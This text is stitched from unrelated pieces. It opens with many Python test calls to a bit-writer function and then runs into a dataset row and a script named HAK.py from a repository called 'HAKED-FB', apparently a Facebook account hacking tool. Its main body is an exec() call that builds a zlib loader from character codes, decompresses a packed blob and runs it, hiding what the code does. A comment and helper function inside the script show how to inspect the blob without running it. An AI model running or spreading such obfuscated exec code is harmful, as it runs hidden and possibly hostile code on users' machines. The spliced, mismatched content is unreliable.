_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 38, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 37, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 36, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 35, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 34, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 33, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 32, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 31, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 30, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 29, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 28, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 27, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 26, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 25, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 24, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 23, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 22, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 21, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 20, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 19, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 18, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 17, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 16, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 15, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 14, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 13, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 12, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 11, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 10, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 9, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 8, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 7, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 6, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 5, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 4, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 3, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 2, False, 1)
_test_writer(b"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 0, 1, False, 1)
_test_writer(b"\xf8\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1)
_test_writer(b"\xf0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2)
_test_writer(b"\xe0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4)
_test_writer(b"\xc0\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8)
_test_writer(b"\x80\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16)
_test_writer(b"\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -32)
_test_writer(b"\x00\xfe\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -64)
_test_writer(b"\x00\xfc\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -128)
_test_writer(b"\x00\xf8\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -256)
_test_writer(b"\x00\xf0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -512)
_test_writer(b"\x00\xe0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -1024)
_test_writer(b"\x00\xc0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -2048)
_test_writer(b"\x00\x80\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -4096)
_test_writer(b"\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -8192)
_test_writer(b"\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, -16384)
_test_writer(b"\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1)
_test_writer(b"\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2)
_test_writer(b"\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4)
_test_writer(b"\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8)
_test_writer(b"\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16)
_test_writer(b"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 32)
_test_writer(b"\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 64)
_test_writer(b"\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 128)
_test_writer(b"\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 256)
_test_writer(b"\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 512)
_test_writer(b"\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 1024)
_test_writer(b"\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 2048)
_test_writer(b"\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 4096)
_test_writer(b"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 8192)
_test_writer(b"\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 16, True, 16384)
_test_writer(b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 3, 2, True, 0)
be66468cb8281766fef3f8d48807d87a800eda04 | 143,661 | py | Python | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | ["MIT"] | null | null | null | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | ["MIT"] | null | null | null | HAK.py | Animous34/HAKED-FB | 91085252199241fa1ff3087ae3899cfe5c66c921 | ["MIT"] | null | null | null
# Github : https://github.com/Anonymous 34
# Telegram: https://t.me/SAUJF
#It is not good for your personality that everything in you is great except for your mind
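# The exec() call below is a common packer pattern rather than real
# encryption: the inner lambda assembles the string
# __import__("zlib").decompress from the list of character codes, eval()s it,
# applies it to the zlib blob (note the b'x\x9c...' header), and exec()s the
# decompressed source. A hedged sketch for inspecting such a payload without
# running it; inspect_payload and blob are illustrative names, not part of
# this script.
import zlib

def inspect_payload(blob: bytes) -> str:
    # Decompress the packed source and return it as text for review,
    # instead of passing it straight to exec().
    return zlib.decompress(blob).decode("utf-8", errors="replace")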
exec((lambda _____, ______ : ______(eval((lambda ____,__,_ : ____.join([_(___) for ___ in __]))('',[95, 95, 105, 109, 112, 111, 114, 116, 95, 95, 40, 34, 122, 108, 105, 98, 34, 41, 46, 100, 101, 99, 111, 109, 112, 114, 101, 115, 115],chr))(_____),"<https://t.me/TT_RQ","exec"))(b'x\x9cd}\xe9Z\x15\xcb\xb6\xec\xff\xfd\x144\x8a\x80\x08Y}\xa5\r(\x88\xa8\xa0\xa2\x82\xa2\x94J\xb5\x80\xb4""\x88\xf0\xecwF\xc4(\\\xe7\xbb\xe7;\xae\xad0gU6\xa3\x8d\x119rth\xf1\xb0>\xb98>\x1d\x9a\xbf\x18z\xbf\xdb\x9c\x94C\x8b+\x8b\x7f\xfe\xfcothi\xf7t\xe7W5t\x7fh\xe7\xf4\xf4\xf8\xe7\xfd\x99\x99m\xfe`\xba>:\x98\xe1\'\xfb\x0f\xae\xb5\xfb\xed\xf6Iy\xf0\xef\x93\xa7\xd3\x07\xed\xcc\xda\xda\xb7wo\xff7\xfa\xe2th\xf7\xe7\xd0\xe1\xd1\xe9\xd0\xf6\xd1Q3\xd4\x1d\x9d\x0c]\x1c\xfd:\x19:nO~\x1e\x1d\x96\xfb\xbb\xa7\x17C\xa7;\xe5\xe9P{\xd6\x9e\\\x9c\xee\xec\x1en\x0f\xed\x1e\xe23\xf8\xde\xf6I\x8b_\x9d\xd7\xed`\x887\xdf=\xd8=l\xfe\xd7\x9e\xb7\xf5\xf8\xf8~yP5\xe5\xd07\xfc\xdf\x94\xfe\xe7\xdb`\xcc\xfa\xcbx{V\xee\xff\x9f\xcfL\xe1\xff\xed\xf7\xd3\xdf\x8fv\x0f\xc77\xbf\x8d\x0f\xfe>\xc1\x87\xe3\xbb\x83w\x7f\xfb\xf6ebb\xfc\xce\x9d\xa9M\x9fL\r\xe1O\xe0\xf8\x1f?\xf8O\x10\xe2?\x01\xfe\x13\xe3?\xa9>\x81?\xb1\x9b\x1a\x8a\xf0\xc3\x10\x9fq\xb9}\xcf\xe7\xfaq<\xf8R\x9c\xe2\x87\x0e\xff\x19\xfc\xcb\xfb\xfeY\xffytl\xbf\x0c\x82\x84\xff\xf92U\xef\x9c\x0c\xc6\xc3\x19ML\x8d<\xfc\xffWydj\x04\xab12\xf8Tu\xe7\xbc8\xf7uS\x9cW\xcd\xc5fq\xde$+\x83\xbff\x0f\x8b\xf3\xae\x1e\xfc\xe9\x06\x7f|q\x1e\xc4\xc5\xb9\xcb\x8b\xf3|\xf0\xa7\x0c\x87\x06\xdf\x18\xfc\xd0G\x1f\x06\xbf\xa9\x1f\x0f\xfe\x13\xe8\x8f\x1f|\xc5\x0f>\xe2\x06\x1f\xcf}vk\xf0\xaf\xc1\x83\xf3\xc1\xbf\x82\xfe!\xc1\x93\xc1;\x06\x1f\xad\xf1\xe4v\xf0\xf7j}\xf0\xc8j\xf0\xa9\x10?\xbc\xc48\x8a\xf36\xbb?\xf8\xd5\xe0\xd7\xf9\xe0cu\xa8\xbf\xe3\x19U9\xf8{\xb6\xa1\xaf4\xe9\xe0\x93\x83\x1f\xf8\xc1\xf3\xca\xc1\x9f\n/\x89\x8a\xf3\xac;\x1b<\x1c\x8fi\xfe\xee\x0c\xfe\x96\xfe\xd9\x19|\xbd\xc2D\xf8&|m\xf0\xc7\xf3\x7f\xaf\xf5\xd1\xae\xc4\'\xfe=\x0b\x1f\xe6\xcf#\x8d(\xaf\xfe\x0c>=\x98[7\xf8e\xe34"~\x08\xa3\xca\x06/\xee4\xdar\xf0\xf72=\xd3/\xf2hI\xd3\xec\xe2\xc12\xe7\x18\xeb\xe0#m=7\xf8\xce\xe0Y\xcd\xe0\x07\x01\x86\x96\x0c\xfeT\xdbX}\xbd\xa0\xea\xde\x0c>\xda\xce\xdd?\xc4\x03?|\xd4+|6\xa7A5X\x95\\+\x83\xd7`<\x9d\xad\x16\x06\xef\x07\x83n"\r\x1e\xffn\x1a\xfd\xbb\x89\xf0\x81\xfc\xc1\xa3\xc1k+,\xe6,&\x97\xeb_X\x01\xac\xa8\xc7p\x9b|\xf0\x99\x123\xc0\xbfR\xedW\x89)\x0e\xc6Q\xe3g\x98f\xf9\xef\x15\xf8L\x15>\xc2<f5\xc0\xa6\x1a\x8c\xb6\xc1\x96\xe0\xed\xe5\xe0\x1fu0\x98b\xe7\xb4\xa0\x18S5\xf8r\x90j\xe1\xb1\xb3]\x88=\x1b\xfcq\x90\xa7#\xfc\x02\x02QcK\x07\xdf\xc0l\xebo\x97\xb6L\xf8|\xa5\x81p\xde\x83\x7f\xb7\x91\x9e\xc3\x81\xe3\xb9\xa9\x96\x13\xdf\x86`t)\x86\x04\x11\x88\xb6\xf5[\xbc\xb9\xa9\x8ff$\x19e$\x91\xaf\xbb\xed1\x8d\x94\nPj\xd5\xf1\xdb\xbc_\xd9F\xab\xdcU\x9bz"\x86\xe12{\x15\xf6\x18\xebd\xbb\x89\xa9\xd6\x81\xa6\x8d}\xe4\x9fNk\x8b\xa1c\xb5\xaa\xee\xf7\xd1\xe015F\x91`\xb4\x0b\x83\xef\xe6\x1a\xb6K\xa5\x8d\xf8,w\xaa.\xee\x0c\xfeUk\x88\x90\xa8\x80C}\xf1\xef\x07u=\xd8\x85<\x98{\xe1\x02)\x1e\x96\x06{\x17\x04\xb3z(~\x88\x99\xf9\xf6.$r\xf0\x15\x8c\xd8c\xf1\x97_h\xf90\x0f\xbe;\xd7\xfe\xb7\xee\x9bm~\x02-\xb4\xefw\xcb\x18MWBCa\x1el\xb0\xf8\xc2\xe03\xa7\x9cZzn\x82\xdeJ\xfb\xf9\xc4\xd8\x968\xd62c\xe5|\xc2Q\xde\xb1\xed\xc3\xd8\x07\xaf\xa8\xb9\xf0ol\xdf!x\x83\xc7\xd4\xe5]\xad\xb2\xaf$8\xa5)SW\xefj\xc9=F\x18N\xaep\x81O\xa4!A\x82\x87\xb7\xc9\xba\xedP\xa5\x8d\x87\x88ie\x1b\x0e\xea\xce\xf3\xfew\x93\x18\xec\x87\xaf\xfc&7\xb3u3\x9a\x03\x84\x14\xaf\x80H8L\xe2?\x7f\xf9\xa6\xf5\xc5x\xf11\x17-^\xe0\xadx\xe0\xdb\xbf\x18\xfb\xac\xed\x99{\x83\xe5\xaa.\xf0\xd7\xb9/Z\x08\xc8Y\x
1bP\xbc7m\xad\xbc\xd3\x82\xba\xec\xe3\xae\xe4\x0c\x1f\xd4l\'\xf0\xdd\x03[t\x8f\x1d{\xc3o]|\xc1p4\xed*\xd6\xfaB\xe2\xa8`\xa9\x86\x8b\xbf\x07\xf9\xdf}\xedD\xee\x86g\xbf\xd2f\x9f\x0c\xc6\xd7v\xfa}n\x12\x8d\xe7\x97fB\xeb`T\xb3\xab\xcd\xfaan\x10ql\x86\x83\xec5\x10~\x0c\x19\xe6\xa4\r\xf7$\xf1\x90&\x8c\xa3n\xae1\xb8i(B\xbeo\xc6)o\xa5Jx\x8e\xd6\n\x7f\xff(3\x07;\x8f\x1d\xa9S\xb3\xfb\xceT?\xfa\xf6K\x92B\x15\x85\x0cT\x7feQ\x07v\xa7\x985\x95\x88L\xbe\xdaG\xbd)=\x92\x90\xb4n\xda\x1f=\xc00\xb6s\x19\xe5<\xdf\xc3\xc4\xc7 \x15o/%\x93\xae\xfe*\xe1\x85(\xbaP\x1fl\xb3\x8fx\x1b\x9c\x11\x15\x12&\xd0\x07\xe9$\x97\xee\xe4\xfa\xbd\x94\xaeI\xde`\x0c\xc72\x95XtOi\xac\xda\xaf\xd8f|\xe0X\xcf\xad\xcbC\xb8\x95S\xdb\xf2Z:\x16\x98]\xe3\xb6\x95\x7f[\x9bP&\xef\xd1\xf1\xe3\xc9\xc4\x9ciI\xa6\xe5\xeb\xba\xfb\x1c\xd59\xd4\xbfiG1\xfb]\xedG\xee\xf8\xac\xd3\x87\xd7?4\xa4:\x9e\x86m]\x87A\xcc\x0e`\x94\xe1\x8d\xf2\xb7f\xe0\xea\x0b\xb8\xfc=\x8d\x15:\x937\x8f\xb4\x91\xf0\x80\xf4|\x90\x81zSf\xa5\xb5\xa8\xa1\x1e\xac\xc3\xc9u\xef\xd6\xb5gn\xb0\x7fA\xa6\x85\xa2M\xc4\x86\xfb{\x0f\xfe\x0e\x06P;I\x08\x1d4\\!\xfdc\x8e\x81\x9f\xdbt\xcd\x8af\xdd\xfdK\xc9C\xe9.M\xa43}\x1e\xbf\x86\x93mC\xf9\x15\xac6\x1e\n]\xf4\xffD\x04\xe3j\xaaQ\xb3\xec\xf8\\\xf5\xe1\xa7\xadkp\x1fK>\xb5\xe4z\xc9\x0c\xbe\xc8\x8b\xb9\xf0\xc7^\x05\xa9\xcd\x96\xa5\xffM\xfez\xf0\x1f\xaa\xfb\xe2/\x8b\x05\xf0c\xb8\x96\xac\xfbx\xa0\x15\xe3\x8f\x82I\xf9\xba\xaeB\xb0T\x8e?\xc4l t\xd5w\xa9\x11^PU\x16k\xb9=\xfa\x94y\ty\x19\x1eD\x92\x84\xaa{\xb7-\'\x0c\xed\xe0\\\xf2\x17_\xfe\xf9\xa3\x81\xa4\rk\xfe0-t2\xe69]\xfe\x17\xbb\xb9\xac\xb8\xad\xf1W\x12\xe2\x1c\xd3\xca~k\xad\xe85R\xd9\xd6\xdc6\xa9\xcdg\xcd\x8a\xd5\xc1;\x8d\x12\x1f\xab\x18\xefE\xd0\t\x18M\xfci\xf2EmWi^\x89\xe1\x97\x9b\xc7*>\x86@\x97\xc7r\x1b\xd4e\xbc\xa22\xeb\x12\x99\xdbw\xb4\xb4\x7f\x83s\x08#d\x14\xd1bT\x99\x01l`|\xa2\xb1I\x8c\x0f\xab\x13\xfe\xf9\xe7\x9a\x18\r\x05oz}\xb6\x10,\xd0\x12@\xe6Z\xf7\xe3\xef\xfe\xe7\xdc>\xed0\x0bs~\xb0\x8f\x81\x85\x83\x8c\x88\xf0\xf7\xe4\x81\x9c\x12lH\xee\xae\x9f\x0eF\xe4\x9cIw)\x05\x82\xe5\xc1j\xc0\xc8\xe5\xd1>E\xfc\xe4\xeb\x98\xc6\xc9\xb8"\x91\xb9\xaa\xaa\xa5\xb1\x9dW\x10\xcbDsv\xed\xa1v\x13~\x12\x11\x8d\xeb\xe66\xb0dc\xd2\xe0\x0e\xfb\x01/\x14\x84\xab\xb0\xb7\xf3\xcf\xb5\xaeUo\x18#\xb9"\xac\x9d\xb7\xc0\x98\x92\x03\xab\x87\x05p\xf5\xda\x98<qU?Y\xd7^\xfa\xe0\xeb\x13EK\x8d\xab\xccQ!\x96\x84\xb2u\x8c\xd0\xd7\x86#mt\x0ek\x00\xfd\x81\x88#\x96\xaa\xf3Y\xadj\x05K\x04c\x88\xf9a\x89\xf1z\xef.vGnk\xb7\xda\xaa\xfer?\xbdkF\xae\x91\x98V\xe1.\x85y\xfa\xf1\xd4\xe0[\xda\xf0\x93\xe5\x03l\xd0Px\xbe\xa9\xc1\xe3\xc5e<\x85-\xcc\xbeiu\xbd\xdf\xad\x97.\x18%\x1c*\x85p\x90\xc82^\xba\xc6\x7f\xcd\x9c\xbbmS\xfeT\xf9\tV\nC,M\x02+\xba\xa3u\xa4)\xf8\xc0\xfa\xf3\x9f\xda\xda&\xbc6)\xcf`\x8b\xcb\xe4\xb5\x1cU`A\r\x14\xa8\xc9G\xf1\x83sL\x0cb\xf7\xb9\x8f\r\xb5\xe8\xbe\xf9\xa3\xcf\xe5\xf5\xd6\xe8>\xcc"\x94}\x01K?\xf4\\/\xc4\x13a\xf7\xf0\xa2\xc6%\xb3\xdaA\x98\xe4\xb6>>\xdf\x85k\xfd\xb0%\xcbT\x9b\x99\x84\x95\xa8\xdc\'I\xd6 
"\xbb\x03\x01\xcd\x06\xcb\xe4K=\xaf\xea\xc6v\x0fl\x12\x99|\x92\xd48\x94|\xc1\xdet\x16\xd90\x86\xc0w\xfc\x9eD\xbc\t\xd6o\xdb\x8e\xbb[\x88\x05\x7fKA:\xcaa\'\xf7K\xb7\x1b\xef/I\xe2\xb1\xd1\xf8\x02\xb5\x03F&[\xff\xfc^\xef\x84\xb3\xad\xd2\xdb\x1ak\x80\xe0<\xba7\xd4\xdb\xea\x8f\x9a\x0b\x82T\x17-\xef\xfc\xd1\xb3\xa1w-\x83\xa2Q\xa8\x82\xedb\xa5a\xba\xf4\n~`A\x13\xf5\xa6\x9e\xb4\xe9\xdd#\xdb\x9b\xf0d\xf3\x9f\x89k-\xfdar\x00\x0b\x1a\xad\xfd\xb3\xc3\\\x84\xc8R\x11g\xc1v\xf0=\xb9\xf9\xc4\t\xde\xf3]\xbb\x8b\xe5\xc7K\xa1\xe7X\xa8\xca\x99@`l\x14\x86\x04ya}\x8d\xa1\xcf.\xbf\xe5\x9ba\x12\x11\x98!T--\xdb\x80yd0\x83\xb5I\xfe`>[\x12\x82\x06q6l\x87wm\xd4\x8d\x99\x84\xc4C2\x995\xdds\xaa=\x0c\xa2\xcd\xb5\xa9\xe1\xe9\x8f&\xdb\x9d\xc5\xcdX\x90DI(\x82\x03lZ\x95-i\xfa\x0c\xe0\x99\xf1\xc2\xfd5\'\x92Gx\xa7\xc6#\xe0D|\xdb\xc1\xed\xa4?\x11\xd2\x84f:s\x97\\T\x9f-\xecJ\xe5\xf1\x11\xef\xf1w\xcd\xa5\xa5\xc4\xe9\xabk32\xb5\r\xbb\xbb>\xc3jB$V^\xed_*\x0e,\xb31\xa8\xe6\x98)\x8c%\x85\xb9\xe5\xa6\xcc9\xd2\xf8\x11v\xf4.d\xea\x91M\xb8\x99\x19\xd2\n\r\x82\x11\x8b\xa2\xf2\xf6tXbU%+{\x0f\xb1Z\x88`\xf1\x12\xe6!u\xbb\xfb~\x0f\x0b\xfdf_\xcb\x871\xe3\x13\\z\x84\x8c\xa5\x05\xf4A\xca\xc8\xefZ\xe3@\xe0\x0c|\xa2\xce,\xa1\x80\x90A\x9a\xa8\x97\x16Dt\xe5#!\x18\x10\xa9\xc1\x96?/N\xbfZ\xfe\x06\xfb\x98\xde~\x01o\x0f\xb5\xa9\x9b\x87\xd3X\x90\xfb\xdc\xfbC\xfaf$<]\xba)O\xe0\xa3\x97\xf2\x19\xb0\x9f\x8c\x8c\x02-d\xde\x1c\xbc\x87\xd4M~\xd6\xa2\xba\x88\t\nf\x02\xad\xf6\xb0\xf2u\xb2\'\xd9C\xf0\x8d\xf0\x08\xbfQ\xcc\xbdG{?\x8a@\x13aW6W\xea\xd1\xc4\x03RI\x02\xa6C\x87\x93\x9b.\xb5\x8a\x1d\\\xa7p\xb9\xad\x10\x84zs\x97x\x0f\xac\xaaO7z\xb1\xc1\xa8?<\xb1\xb0\x16c\xafB\xd9\x1d\x845u5bq\xb8\x8d|\x13B\xf3\xc6B\xfc*<Q\x84Q\xdb\x0b\x03\xf3\xcc\r=\x02<\xd8_<\xb0\xd2\xc7]\xb0<e\xd9i#\x01\xabK\xaa2s\xbf\x19\x89?\x8c\x0fV\x01\x01e\x03\x17\r/SW\xcfV\x95\x07Q\x82\xcb!i!v\x1e;H\xab\x92\x19\xd2\x93$\x1f\x14\x9a\x00&"T\x04Mb(\xd3\xcd\x11\\\x99\xd4p\xb0jM=\xa6D\x8c\xa1Q\x18\xeb\x1b\xbe\xfe{8"_\xce8\xc3\xbf\x85:\xceka\x83\xe4\xbbD\xa4\x8b\x16\xe1\x05\xd6\xe1;\xa7\x8a\x13\xa4\xf5%mk\xa8\xd1{\x7f-\xf5\x80\x18v\xee,x^\x9cL\x87\xb2RXR"\x15\xb9\x10\x9e\x96f\xfdB\xf6\x15\xdbHa\x88-\xf8I\xb6\xf9\xb6{\xf6\xdc\xd2\xf01\'\xdb\x8c\x8fU\xdd\x01va\xdc\xc4\xd0[\x94\x8bm\x80\x89F\x98\xe0\xf3\x87k\x96y{\t\xc3 1[\xd1~\xb8\xea~\x1f\xdbaI\xa3\xa9a\xad\xb6\xab\xe7-\xc5\x1b\xac\xd1\xe1\x1ed\x9f\xee\xb7\x19\x91\xad\xc1?\\\xbdsmF\x8d\xb6#\x95zV\xce\x12\x81\xd8L/ 
\x1e\x02/\xe1\xb1\x89\x9e\xe5\x93\xde\x86C\xa5\xcc$\xb5e\xfdT\x96\x8f\x80\xa2e\xa5L3SI\\k\xd2\xda\x94\x88\x8c\xf3\xb3\x8f\x18\xe7w\x0b=\x92H\x1b\xce\x98\xa8\x96\xbeT\xd5\xd6m\x8d\n\x06\x04\xf2m6\xff\xe4w\xac\x98)po\x95\xab\xd0k1\xe3\re\x9d\xca\xf8|\x18\xcfo\xf5\x80\xb2\xc4~\x84\xd3\x1a\xba\x8b\xc7\xf1\xe3\xbb\'\x9a\xbf7\xcc\xabF\xf0\xd0\xa6[\x96\xa9\x94\xa7\x84H\x0cL\xc4\xffz\xa6\xd4\xd3G\x08\xef\xb5TT\xd9N\xa19\xf6\x81\x999\xa6\x91\xeezE\x83\x14\x9dX\xf1O\xde\x1dk\xb7\xa1\x05\xbe\xfd\xad\xef44PU\xf8%\xd3\x9b|\xd6\'\xef\x88\xc1\xd2\x1d\xcd\xb0\xf6K\xcf\xcc4"\xe4\xf2\x1e\x18\x82\xdb3\x180\xd9\xde_\x99\x91_\x87\xa3\xec\x12\xe4\xd0\xd5\x95\xe6\x85\xc12|\xa6}\xcd,rp\xe6\x1a+\x0b@\xda-\xcb\x9f\xf9\x839\xed\x1f#\xaep\xc6\xc2\xf2l^\xb3n\xba_K\x10\xfeu\xbcdD\x02TY\xe6\x90\x13\x06F\x98\xe4\x9e\xc8k\xd1\xc24\x8f.\x81\x81U?\xa5qL\x1e\xaa\xad\'f\xde\x12\xa2\xb5\xb7\xc6\xb0\xe0u\xf3\xc6\xa4\xdf\x90/(\x9c\xeb\xd6\x9b\x17&JL\n\xa6\xa0P\xa5LwE\x80\x19@MX\x9a\xf7\xce\x93\x9d9\xd9!\xfc\x0b\xd9F^\x0e\xe3\x93\xcb\xc3\xfaN\x99\xce\xfdQ\xd4\xd8\xc6s/\xae\xb7\xa5\xa3\xada\x8a9C\xbc_\x90\xd5?\x16\x83E\xa7\x9fF\xb4\x8bx"\xfe\x97@c\xa0\xd7\xbbx\xb7\x91H"\xba\xc3BW\xbdCc\xf4>\xdb\xaf\xa0er\xd0\xf2\xf2Z\xd10\xa4\xae\xa9\x8f\xa04+C\x8aY\xba\x1c\xa1I\xb8)\xc9\x0fLG\x114V\xed\xfa\xf1\xc7\x05K\xa4\x9c\x16\xd7\x13Y\x1c{\x04[cAd\t)\xc6JqV\xe9\xbe\x95\x05\xaa}K\xa8\\(\x84!\x88\x8f`\\\x0e&\x8e\x154\x10\xd7\xf4\xca\x03+\xe6\x19~\xcb\x92\x8e\xfc\x1cv\xeb\xf5?\xec\x14AX\x9d\xc4\xe7\xb7\x9fC\xdd`\xb2\xea\xcdQ\xbd\x1e\xda\xcb(\x07:\n\x03\x88a"\xe0\xac\xa3gP\x98\x87\xe9\x1b\xb8\xbd\'\xf2\xfde>2+)-i\xca,\xd8-\xcd;\x84\xb2\x0cM\xf9U\x1bC\xe7\x0f\x18993\xab\xd0\x16\x85\xd6\x97\xd1d\x88\x1d\xcfwi\xa5\x0f\xa7\x16\xf5mb4\xb5\x16;7\x88\x10\xea\xe9\xba\x15\xbd\x16j\xe9LQ\xb0=\x8c?\xe2u\xcb\xb4\x0c\x19g&\xde\xcd\xf6\xc15\xfe\x93\x97\xe3\xda\xb3\xbc\xbdex7|\xbc\xcf\x91,\xfamy;\x9f\xbdlP\xee\xa8\x8f%$]\xfc\x00^\xb6\x9c\x84\xe1\xbd\xbb)y\xe7\x9f\xfa\x19l\xefs\x83\x88\xc2\x0b\xe8\xf3}\xe9\x01\x84\xb3\xca\x8f\xda\x072\x0f\xac\xd9T\xf2\x1ct\xe8\xf5\xa8\x05G\xddv\x0f\x91\xfe\x91er-\x1